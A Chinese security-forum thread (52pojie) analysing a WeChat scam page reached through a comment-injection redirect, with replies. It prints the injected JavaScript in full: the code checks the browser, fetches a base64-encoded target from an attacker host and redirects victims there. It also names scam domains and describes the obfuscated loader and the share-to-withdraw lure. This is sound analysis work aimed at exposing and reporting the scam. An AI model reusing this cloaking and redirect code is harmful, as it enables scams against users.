吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 13506|回复: 101
收起左侧

[移动样本分析] 分析一个微信诈骗网站

  [复制链接]
三滑稽甲苯 发表于 2021-8-18 10:14
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 三滑稽甲苯 于 2021-8-19 11:07 编辑

起因

家庭群里有人发了这个链接
IMG_20210818_090455.jpg
这个骗子的网站实在是太水了,标题都不改一下,年份也不核对(明明是2022才70周年好吧?):
mmexport1629248720610.jpg 年份.png
不说了,上机干它

初探

复制链接,电脑打开,发现重定向到了百度(百度:你礼貌吗?),伪装微信ua也没有用
分析一下,发现它好像利用了注入漏洞,通过评论注入代码来跳转,好家伙
注入.png
经过一波分析,发现xs24这个确实是关键代码

var id=24; var url='https://xssme.cn';
function GetQueryString(name) {
    var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
    var r = window.location.search.substr(1).match(reg);
    if (r != null) return unescape(r[2]);
    return null;
}

function isWx() {
    var platform = navigator.platform;
    var win = platform.indexOf('Win') === 0;
    var mac = platform.indexOf('Mac') === 0;
    var ua = /micromessenger/.test(navigator.userAgent.toLowerCase())
    if (ua && !win && !mac) {
        return true;
    } else {
        return false;
    }
}

function checkVersion() {
    var userAgent = navigator.userAgent.toLowerCase();
    var key = /micromessenger/;
    let res = false;
    if (key.test(userAgent)) {
        var index = userAgent.search(key);
        let version = '';
        for (var i = index + 15; i < userAgent.length; i++) {
            var item = userAgent[i];
            if (/^\d{1,}$/.test(item) || item === '.') {
                version += item;
            } else {
                break;
            }
        }
        version = parseFloat(version);
        if (version >= 7.0){
            res = true;
        }
    }
    return res;
}

function openLink(url) {
    if(window !== top) {
        top.location = url;
        return;
    }
    var label = document.createElement('a');
    label.setAttribute('rel', 'noreferrer');
    label.setAttribute('href', url);
    try {
        document.body.appendChild(label);
    } catch (e) {
        location = url;
    }
    label.click();
}

function init() {
    var queryUrl = url;
    var rmd = Math.random().toString(36).substr(2);
    var entranceUrl = `${queryUrl}/XT-${id}-${rmd}.ppt?t=${Date.now()}`;
    fetch(entranceUrl).then(response => response.text()).then(res => openLink(atob(res)));
}

if (!isWx() || !checkVersion()) {
    openLink('http://www.baidu.com');
} else {
    init();
}

这个函数的命名还是挺让人舒服的,一看就是一个有素养的程序员编写的
不多说,保存整个js下来,把isWx, checkVersion都改成return true;
Edge控制台运行,跳转到了http://y.ueicuk.abkrsc.cyou/XK-2-ecc5649e38ff2e82d7e1023e7469737487754969?_douyutv=5a817cf682e73c5b356f2803a2e3af61&ex=24 ,但是马上又到了已停止访问该网页的提示
停止访问.png
难道已经被举报了?
手机微信打开,发现网页还在,那一定又是一个用来迷惑分析者的跳转
从请求发起程序链顺藤摸瓜,大概率就是这个k2.js了
链.png
明显有混淆,并且很长
k2.js.png
从下面的网络请求大部分都是它发出的可看出它就是主要脚本
我不会分析这么长还混淆的脚本,那么继续看网络请求,发现一个有意思的(ppt?)
ppt.png
用PPT打开,发现就是一串字符,那么修改后缀名为.txt打开
熟练地翻到末尾
末尾.png
有“=”,盲猜base64,解密一波~
解密.png
明显是json格式,然后unicode转中文
中文.png
呐,数据差不多出来了,甚至还有不堪入目的小广告。。。(值得一提的是这些小广告的链接也对平台做了限制)
继续分析下去也没意思了(主要不会了),那么就反手一个举报,草率结束了吧。

再探(8-19更新)

看到这么多人回帖,我不继续下去都不好意思了
那么我们首先阻止k2.js加载然后访问网址,看看会有什么影响
阻止k2.js.png
主逻辑没有变,页面能够正常工作,那么这个js作用应该就是控制跳转
主1.png 主2.png 主3.png
那么接下来分析一下“马上提现”
选中元素,查看事件侦听器的click事件,只有一个(好耶)
事件侦听.png
点进去康康,居然没有加密
shua.png
简单翻译一下,它的作用是检查goshare是不是一个函数,如果是就调用,不是则提示"提现失败"并刷新。
下个断点,发现goshare的值是undefined
断点.png
goshare有两种可能的定义来源:

  1. 微信内置浏览器自带
  2. 前面已阻止的k2.js里定义

从简单的入手,先验证第一种猜想
写一个简单的html,上传到个人网站
html.png
微信打开并点击按钮,没有反应,那么goshare应该在k2.js里
果然在里面找到了goshare
goshare.png
格式化后先搜索weixin110去除跳转
跳转.png
运行,发现就得到了前面的base64的json数据(由于我装有idm所以自动下载了)
json.png
最后加上goshare();,得到了分享页面,就是有点乱码
分享.png
点击提现按钮就是刚刚的提示
转发.png
这个样本的分析就到此结束了,唯一的遗憾就是不知道它在后台做了什么,好像就是有一个请求得到了ip地址
可能就是像zuxin521所说赚取广告费吧


免费评分

参与人数 35吾爱币 +36 热心值 +25 收起 理由
duck007 + 1 热心回复!
dayu000410 + 1 + 1 我很赞同!
执念i_ + 1 + 1 热心回复!
wildpeter + 1 + 1 用心讨论,共获提升!
MuyiAurora + 1 我很赞同!
yesuifeng + 1 我很赞同!
lenmone3351 + 1 热心回复!
heresy_dd + 1 + 1 热心回复!
幽兰生前庭 + 1 鼓励转贴优秀软件安全工具和文档!
csxy999 + 1 我很赞同!
pdcba + 1 + 1 谢谢@Thanks!
wss310719 + 1 我很赞同!
zqguang3708 + 2 + 1 谢谢@Thanks!
chen4699 + 1 + 1 我很赞同!
单独的浪漫 + 1 + 1 用心讨论,共获提升!
mrxxs + 1 + 1 用心讨论,共获提升!
RainH + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
_小白 + 1 + 1 我很赞同!
biggerboy + 1 + 1 热心回复!
yanlingyun + 1 热心回复!
fanny188 + 1 鼓励技术分析下去,找到利益根节点
ileave + 1 用心讨论,共获提升!
hinome + 1 热心回复!
3195424512 + 1 热心回复!
Hmily + 7 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
timeni + 1 + 1 我很赞同!
哲思 + 1 + 1 用心讨论,共获提升!
kjian + 1 + 1 用心讨论,共获提升!
wuai1023a + 1 热心回复!
Speaker001 + 1 我很赞同!
wangyuan004 + 1 + 1 厉害
woshicp + 1 + 1 强!
Kira007 + 1 我很赞同!
b1ackie + 1 我很赞同!
19511626267 + 1 + 1 热心回复!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

zuxin521 发表于 2021-8-18 12:24
总而言之就是你帮别人点了这个链接的广告,然后别人就有了广告的推广收入,一个用户一个IP,传播出去,就更多了,有点像以前的网赚推广差不多吧

点评

这个确实有可能,我分析过程中没有发现它有明显小动作  发表于 2021-8-19 11:09
Mars1018 发表于 2021-8-18 10:59
miaostar 发表于 2021-8-18 10:17
tewboo 发表于 2021-8-18 10:31
为研究精神点赞!
ikam 发表于 2021-8-18 10:32
其实还是期待一直分析下去
兔子 发表于 2021-8-18 10:51
小白  没看懂
qiaopf888 发表于 2021-8-18 10:53
小白表示羡慕。
ongp1347 发表于 2021-8-18 10:59
为楼主点  分析得非常好
leigdnx 发表于 2021-8-18 11:11
期待一直分析下去
9nine 发表于 2021-8-18 11:39
学到了,谢谢大佬
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-28 07:27

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表